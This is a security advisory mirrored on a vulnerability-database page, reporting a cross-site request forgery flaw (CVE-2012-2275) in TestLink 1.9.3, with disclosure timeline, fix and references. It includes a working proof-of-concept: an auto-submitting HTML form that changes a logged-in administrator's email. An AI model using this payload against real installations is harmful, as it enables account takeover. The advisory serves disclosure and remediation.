Lucene search
K

TestLink 1.9.3 - Cross-Site Request Forgery

🗓️ 07 Sep 2012 00:00:00Reported by High-Tech Bridge SAType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 48 Views

TestLink 1.9.3 - Cross-Site Request Forgery, allows unauthorized actions without validity checks, change administrator's email via CSR

Related
Code
ReporterTitlePublishedViews
Family
0day.today
TestLink 1.9.3 Cross Site Request Forgery Vulnerability
6 Sep 201200:00
zdt
CVE
CVE-2012-2275
15 Sep 201217:00
cve
Cvelist
CVE-2012-2275
15 Sep 201217:00
cvelist
EUVD
EUVD-2012-2268
7 Oct 202500:30
euvd
exploitpack
TestLink 1.9.3 - Cross-Site Request Forgery
7 Sep 201200:00
exploitpack
htbridge
Сross-Site Request Forgery (CSRF) in TestLink
18 Apr 201200:00
htbridge
NVD
CVE-2012-2275
15 Sep 201217:55
nvd
Packet Storm
TestLink 1.9.3 Cross Site Request Forgery
6 Sep 201200:00
packetstorm
Prion
Cross site request forgery (csrf)
15 Sep 201217:55
prion
securityvulns
Сross-Site Request Forgery (CSRF) in TestLink
7 Sep 201200:00
securityvulns
Rows per page
Advisory ID: HTB23088
Product: TestLink
Vendor: teamst.org
Vulnerable Version(s): 1.9.3 and probably prior
Tested Version: 1.9.3
Vendor Notification: April 18, 2012 
Public Disclosure: September 5, 2012 
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2012-2275
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Risk Level: Medium 
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab has discovered vulnerabiliy in TestLink, which can be exploited to perform Сross-Site Request Forgery (CSRF) attacks.


1) Сross-Site Request Forgery (CSRF) in TestLink: CVE-2012-2275

The application allows authorized users to perform certain actions via HTTP requests without making proper validity checks to verify the source of the requests. This can be exploited to add, delete or modify sensitive information, for example to change administrator's email.

An attacker should make logged-in administrator open a malicious link in the browser to exploit this vulnerability.

The following PoC will change administrator's email:

<form action="http://[host]/lib/usermanagement/userInfo.php" method="post" name="main" id="main">
<input type="hidden" name="doAction" value="editUser">
<input type="hidden" name="lastName" value="LastName">
<input type="hidden" name="firstName" value="FirstName">
<input type="hidden" name="emailAddress" value="[email protected]">
<input type="submit" id="btn"> 
</form>
<script>
document.getElementById('btn').click();
</script>



-----------------------------------------------------------------------------------------------

Solution:

Upgrade to TestLink 1.9.4

More Information:
http://gitorious.org/testlink-ga/testlink-code/commit/2d4ac941314f8bda80e265c9de8bacf17d1cd3e6
http://gitorious.org/testlink-ga/testlink-code/commit/c8751a3c9ad8970b49d1bf882203efacd10af087
http://gitorious.org/testlink-ga/testlink-code/commit/252788c2373e73173172ada9af661e0721599891


-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23088 - https://www.htbridge.com/advisory/HTB23088 - Сross-Site Request Forgery (CSRF) in TestLink.
[2] TestLink - http://www.teamst.org/ - An OpenSource test management tool which includes test specification, planning, reporting, requirements tracking and collaborate with well-known bug trackers.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. 

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation